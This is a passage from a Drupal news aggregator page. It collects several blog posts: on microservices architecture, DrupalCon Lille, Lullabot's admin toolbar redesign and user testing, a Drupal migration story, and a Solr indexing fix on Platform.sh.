  • System complexity: the microservices architecture includes a lot of volatile details. As mentioned above, many dependencies between different modules need to be successfully tested using non-standard approaches.
  • Lack of centralized management: MSA provides for using different structures and languages. But there is a risk that you will have to deal with many technicians, making it difficult to maintain the system. We recommend implementing rules for the whole project to avoid technological confusion.

Modern API management platforms provide all the necessary management tools. These powerful platforms offer a wide range of functionality, from adding new APIs to investigating data analytics and resolving security issues, simplifying the complex nature of web products.

Which language is best for microservices?

The adoption of microservices occurs with different frameworks, versions, and tools. It means that since each service is developed and deployed separately, they are loosely coupled to each other and may belong to different teams, which means they may be written in different languages. Most often, professionals choose the following options:

Java

Java is ideal for microservice architecture due to its easy-to-read annotation syntax. The feature facilitates the development of Java microservices when using particular frameworks. It provides excellent value in readability, which is especially true when interacting with complex systems.

Golang

If you plan to improve an existing project, we recommend choosing Golang. The popularity of this programming language is due to its concurrency and support for APIs that are important for the architecture of microservices.

Python

Python actively supports integration with various technologies. Developing templates in Python is faster and more convenient when compared to other frameworks and languages. Python microservices are compatible with legacy languages such as ASP and PHP, which allows you to generate web service interfaces to interact with microservices.

Each of these options has its strengths and weaknesses. You can select any programming language to create a microservices architecture. However, choose a language that suits your project's goals to make the creation process as flexible and efficient as possible.

Microservices vs. monolithic architecture

In a monolithic architecture, all procedures are interconnected and function as a single system. It leads to the fact that if one part of the system is faced with a surge in demand, it is necessary to scale the architecture. Adding new features or improving old functionality becomes more difficult as the code base grows. Such complexity limits experimentation and prevents the implementation of cutting-edge concepts. If you prefer a monolithic architecture, be prepared for application availability issues, as many related processes increase the risk of failure of all functionality.
If we speak about microservices architecture, it relies on independent elements that activate each program process as a service. These services are connected through a unique interface with the addition of simple APIs. Services provide business opportunities, and each is responsible for one task. Each element can be deployed, scaled, and enhanced to meet the demand for a specific digital product functionality because they are activated independently.
Understanding the difference between microservices and service-oriented architecture (SOA) is also essential. SOA is a software development technique that fully uses reusable platform elements or services. Service-oriented architecture has an enterprise scope, while microservice architecture is based on the application scope.

Future trends in a microservices architecture

Modern companies are increasingly moving towards a microservices architecture, focusing on the needs of end users in various fields, e.g., commerce, medicine, IT, etc. The active implementation of such structures has led to the emergence of several popular trends that will continue to develop in the future:

  • Adding service meshes to deal with microservices: a service mesh is a reconfigurable infrastructure layer for a microservices application. It guarantees controlled, observable, and secure communication between individual modules in the software environment. The service mesh speeds up the exchange of information and controls the operation of container services. Experts use such a layer to evaluate the connection between different parts of the application; with it, it is easier to transmit insights throughout the system. The popularity of the service mesh will increase as more and more specialists prefer microservice architecture.
  • Serverless architecture: such a system does not require servers' responsibility, so experts no longer need to focus on their implementation, configuration, and maintenance. Under the rules of this structure, the cloud service provider monitors the dynamic allocation and provisioning of servers, which makes it the optimal solution for cloud processes. Combining serviceless architecture and microservices will create an ideal environment for development and continuous delivery.

Implementing a microservices architecture in an organization requires good technical skills and changes to the company's internal project management systems. All of these trends will shape how microservices work in the future.

Final words

A microservice architecture is best suited for large cloud applications developed by multiple teams of specialists, while a monolithic codebase is optimal for smaller software. Microservices have certain advantages and disadvantages; for example, they are easier to develop and maintain; however, managing individual components and preparing for failure involves a lot of effort. 

Nov 03 2023
Nov 03

Wir wünschen frohe Weihnachten und ein erfolgreiches neues Jahr!

Wir wünschen frohe Weihnachten, einen schönen Urlaub und einen guten Rutsch ins neue Jahr! Genießen Sie die Feiertage und starten Sie gut ins Jahr 2024!

drunomics Büro Wien22. Dezember 2023

Nov 02 2023
Nov 02

Dive into the heart of Drupal GovCon with host Matt Kleve as he captures the energy and insights from attendees who have experienced the conference firsthand. We showcase a mosaic of perspectives that embody the spirit and community of GovCon, bringing you the voices that animate the world of Drupal.

Nov 02 2023
Nov 02

As DrupalCon Europe emerged for another year, our team were buzzing to take on 2023’s edition of the annual event, which took place in the capital of the Hauts-de-France region of Lille in France. 

Going into another year of DrupalCon, the team were particularly excited to meet other members of the Drupal community both new and old, learn more about what the future holds for Drupal, and catch some highly anticipated presentations, as well as one of our team preparing to give their own.

As soon as we entered the event, we were met with an abundance of activity. The building was full of booths as far as we could see, which were hosted by a number of different Drupal contributors. In addition to other Drupal agencies, these included some of the larger names in the community such as Acquia, as well as organisations who provide some of the most popular tools used in development, such as CKEditor.

DrupalCon

Exploring and Volunteering

While there were many attention grabbing elements in each booth, such as an espresso machine, a claw machine, free stationary and many other interesting features, the booths were also highly educational in topics that we were not previously as familiar with. Thanks to the organisers, the DrupalCon Europe app was extremely useful in motivating us to attend as many booths as possible and engage with the community. This app also aided in the networking side of the event, allowing us to save people’s contacts, even suggesting ways to reach out to them after the convention.

A highlight that was shared between all of our team was the volunteering experience, in which we monitored a total of approximately 20 sessions as a company. 

Not only did our volunteering further contribute to Drupal and show support of the event, but it was a fantastic opportunity to network with other volunteers and speakers, creating an instant connection that could not have otherwise been replicated so easily. Additionally, this was a refreshing change from the typical contributions, which are primarily displayed through code contributions.

Expanding our Drupal Knowledge through Presentations

A moment that we had been highly anticipating in the weeks leading up to the event was a presentation given by our very own Delivery Manager, Alice Minett, on project first aid. 

Alice

Within this presentation, they were able to contribute to the community by educating others on the best ways to respond, recover and thrive in the face of project failure. With commendable experience in leading projects through to launch no matter which disruptions complicated the path to success, Alice was the perfect lead on this topic.

Their presentation ran as smoothly as we had anticipated, and we are extremely proud of Alice for representing Zoocha at DrupalCon. 

In addition to giving our own presentations, we also attended many others throughout the course of the three days. During this time, we were able to witness some inspiring and thought-provoking content which we will be sure to carry with us in our work.

Notably, the annual Driesnote was as fascinating as ever. Dries, Drupal’s founder, retold the origin story of Drupal and its buzzing community through a unique method of allegory. By recounting how Drupal came to be and the journey that led it to be the global CMS that it is today as well as understanding user feedback, Dries was able to introduce new features that we are highly anticipating the release of in the near future.

Driesnote

Amongst many other interesting presentations, we were introduced to the creation of the Drupal Marketing Committee, extending the success and the work displayed within the Drupal community to others. Moreover, we had the chance to celebrate women in Drupal and thereby take a step closer to extinguishing the preconceived stereotype against women in the tech industry. 

Furthermore, a keynote that was particularly admirable was one given by Sarah Furness, an ex-RAF helicopter pilot and Squadron leader who was the first female helicopter pilot to both fly and lead UK Special Forces in Iraq and Afghanistan. Her authentic and vulnerable approach to leadership and the acknowledgement that we are all human was very motivational and powerful.

From a more technical standpoint, our team were able to appreciate and learn from a plethora of more targeted sessions, with some team highlights including the problems and resolutions that can be found in performance audits, and the collaborative decision making in regards to project architecture.

Architecture Talk

Trivia Night

DrupalCon would not be complete without the annual Trivia Night, which we had the honour of sponsoring. This was a fantastic way to not only end the week, but also to bring everybody together and socialise with other volunteers and community members in a more casual setting, all while putting our Drupal knowledge to the test.

Trivia Night

A Final Note to the DrupalCon Organisers

At such a fun, educational and sociable event, it is important to credit the organising committee and recognise the sheer amount of planning that went into the event. Not only did it allow all of the attendees to enjoy themselves, but also feel comfortable.

One addition in particular that displayed care and support in regards to diversity and inclusivity was the pronoun stickers that catered to all, allowing people not just to feel that they are accepted, but also be proud of their identity. Additionally, it was gratifying to see the colour-coded lanyards and wristbands that demonstrated one’s desired level of social engagement as well as their willingness to appear in photographs. This was a fantastic, yet simple act that took an extra step to encourage acceptance of those around us.

We would like to thank all members of the organising committee at DrupalCon for putting on such a successful and enjoyable convention. Not only was everybody involved, inspired, and educated, but it was brilliant to see that such measures were taken to make everybody feel included in such a vibrant community.

Nov 01 2023
Nov 01

For Lullabot's first sponsored contribution, we've been focused on improving Drupal's main navigation. We decided on this direction for two reasons. First, it's one of the most visually impactful areas of the Admin UI. Second, its redesign will support other active initiatives to improve Drupal's Admin UI.

Since our last update, we've been focused on a redesign of Drupal's main navigation, or "the toolbar." It's one of the most visually impactful changes to the Drupal Admin UI, and when it's completed, it will complement other efforts like the Dashboard and Field UX initiatives. Our overarching goal is to improve the usability, accessibility, and design of the navigation system to provide a better user experience for site builders and content editors.

We based our initial designs and prototypes on the research of competitors, industry standards, and previous UX studies on the topic. We also gathered insights from the admin theme Gin, which helped us validate several hypotheses. At a high level, this suggested a left/top/top layout as being the easiest to scale and scan.

Multiple rounds of user testing

We approached this design work by testing, iterating, and testing again. Our goals were to get fast, iterative feedback before jumping into development. Multiple rounds of user testing helped ensure we were going in the right direction. As the saying goes, thirty hours of development time can save you three hours of planning, and we'd rather that be flipped around.

We used a combination of card sorting, surveys, and moderated usability tests to collect feedback, which was used to iterate on the toolbar over several months. We plan to "rinse and repeat" this process until there is a contributed module ready for Drupal Core.

User testing: round 1

An HTML mockup served as the testing ground to gauge user satisfaction. Our first round of testers provided overall positive feedback for the new collapsable, vertical layout. All participants preferred the new navigation over the old, though they also provided valuable insights for iteration. 

They got us thinking about the words (Drupalisms) we use and how we might use plain(er) language to reduce onboarding time for less experienced users. As a result, we introduced separate task groups tailored for editors and site builders, enhancing the overall user experience for these specific audiences. The original idea to add these groupings came from discussions years ago and then crystallized into this proposal.

User testing: round 2

Ahead of our second round of testing, we felt optimistic. Our initial prototype was well received, and the menu groups made sense to users.

For round two, David Rosen, a User Experience Analyst from the University of Minnesota, organized a group of experienced Drupal site builders and content editors accustomed to the current toolbar implementation. This group of testers wasn't as enthusiastic about the big change because it meant modifying their current setup.

However, they were able to orient themselves quickly. They completed tasks arranged for them in the testing environment and generally agreed that the new layout could help with onboarding less experienced users.

This round of testing taught us that we'll have to work on the change management and communication strategy to help align more experienced users.

User testing: round 3

During DrupalCon Lille's Contribution Day, we conducted seven pop-up tests to evaluate the mobile implementation of the new toolbar. Participants had varying levels of experience using Drupal Core's admin interface. These in-person tests allowed us to observe how users interacted with the menu on their mobile devices, something that can't be done on a video call.

The mobile testing highlighted users' ability to navigate the admin interface but revealed a few concerns about font size, spacing, and user expectations about the "expand sidebar" feature. So, another round of usability testing is in the works!

Where we are now

Creating a contributed module

On the development side, we've been focused on converting the HTML mockup to a new menu module. We don't want to reinvent the wheel. Instead, we'll try to reuse things that exist in Drupal already, like blocks. We'll provide tools that people already know how to use and customize while also creating a manageable solution for site builders.

When this is complete, we'll start seeking reviews and obtaining approvals from all significant contributors to incorporate it as an experimental module in Drupal Core, hopefully when 10.3 is released.

Exploring a contextual top bar

During this work, we realized the main toolbar doesn't address every requirement we have. For example, space for a contributed module like Environment Indicator or the core module Workspaces must be accounted for. We're looking to contributed modules and Gin to understand how this could be solved.

At the same time, we need to understand the most common customizations website admins apply to provide the best experience for their clients. So, we designed a short survey. It will be distributed to agency website admins responsible for maintaining client websites.

This work will inform our ideas for a sticky, contextual top bar that holds all the extras that users will need based on where they are in the interface. This work is in progress and will soon be available for testing.

Accessibility review

Now that the markup is nearly completed, we are focused on making everything accessible. We've opened an issue in the queue that serves as the parent to the accessibility issues we've collected so far.

What we heard at DrupalCon Lille

The Driesnote at DrupalCon Lille was the first public presentation of the new toolbar to the Drupal community. It was the first time people got a glimpse of what it looks like and how it functions. Attendees were surprised that they could actually help test it during contribution days.

Overall, the new toolbar was well accepted. People appreciated our approach, which emphasized research, usability testing, iteration, and more rounds of usability testing. Combined with feedback from the larger Drupal community, we've made a lot of progress.

Our global community of makers and users create the code, solve the problems, and form the bonds that sustain it.

Drupal.org's Open Web Manifesto

Alongside Cristina Chumillas, a handful of Lullabots from all disciplines, individuals from the Drupal community, Acquia DAT, 1xInternet, and Skilld have been collaborating to improve the admin UI. We are so grateful for how people have self-organized and supported this work. Contact us if you think you would like to contribute, too.

Oct 31 2023
Oct 31

Scary Migrations Benji | Scary Migrations Janez |

In another Halloween-themed episode of Tag1 Team Talks, Janez Urevc shared a challenging migration story from his past. The project involved transitioning a media organization from an in-house proprietary CMS to Drupal, facing resistance from the existing development team attached to their custom system.

Despite technical hurdles and internal opposition, the migration succeeded through an incremental approach, running both the old and new systems in parallel. Notably, they went live just before a national parliamentary election, handling a surge in traffic without major issues.

However, the project struggled due to team dynamics, internal divisions, and leadership's over-optimism. The internal team and consultants brought in for the migration didn't collaborate well, leading to burnout and the dissolution of both teams.

This story emphasizes the importance of managing user adoption, fostering collaboration, and addressing leadership challenges in migration projects. It serves as a valuable lesson for organizations planning similar transitions.

For more thrilling tech tales in the Halloween series, insights on migration, Drupal, and other topics, stay tuned to our Tag1 Team Talk series.

Please let us know if you have specific migration-related topics you'd like to see us cover. Or, reach out and let us know if we can be an active part of ensuring your migration is a success!

[embedded content]


For a transcript of this video, see Transcript: Scary Drupal Migrations with Janez Urevc.

Scary Migrations Benji | Scary Migrations Janez |

Photo by Anna Sullivan on Unsplash

Oct 31 2023
Oct 31

About the project

The client's website sells equipment for biological labs. To deploy the site on Drupal, the Platform.sh cloud hosting service is used. You can connect various services to it by registering them in the config file.

Problem

We have created new equipment categories and search filters for the website. For them to turn on and affect the search results, we had to update the search index, which helps to search for and properly sort the information. However, the Solr search engine server was crashing and rebooting when trying to index the six languages the site supports. Search queries were crashing it only on the development and staging servers used as demo servers, while everything was working fine on the production server.

Solution

The reason was the limitation that Platform.sh sets for demo environments. The Platform.sh tech support responded to our requests with, “Your query is too large, so it cannot be stored in memory”. We started removing fields from the index to shorten the query. In the end, we removed the field that was responsible for the content language, and it made it work. This was enough for the client to approve the changes and bless the deployment to the production server.

It took us 20 hours to understand the problem. It took 10 minutes to fix it.

Pages

About Drupal Sun

Drupal Sun is an Evolving Web project. It allows you to:

  • Do full-text search on all the articles in Drupal Planet (thanks to Apache Solr)
  • Facet based on tags, author, or feed
  • Flip through articles quickly (with j/k or arrow keys) to find what you're interested in
  • View the entire article text inline, or in the context of the site where it was created

See the blog post at Evolving Web

Evolving Web